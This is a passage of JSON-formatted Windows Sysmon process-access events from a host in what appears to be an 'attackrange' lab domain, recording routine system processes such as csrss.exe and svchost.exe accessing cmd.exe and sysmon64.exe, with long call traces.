owerShell.Commands.Management.ni.dll+7fffd(wow64)|UNKNOWN(00007FFD66A63638)|UNKNOWN(00007FFD66A634AC)|UNKNOWN(00007FFD66AE5CD8)|UNKNOWN(00007FFD66A5C094)|UNKNOWN(00007FFD67515037)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)|UNKNOWN(00007FFD66A581D6)|UNKNOWN(00007FFD66A91366)","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5719,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20BF-5F25-0000-001085C60600}\r\nTargetProcessId: 4168\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20BF-5F25-0000-001085C60600}","TargetProcessId":"4168","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5720,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5721,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5722,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5723,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5724,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5725,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5726,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.409","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5727,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.409\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 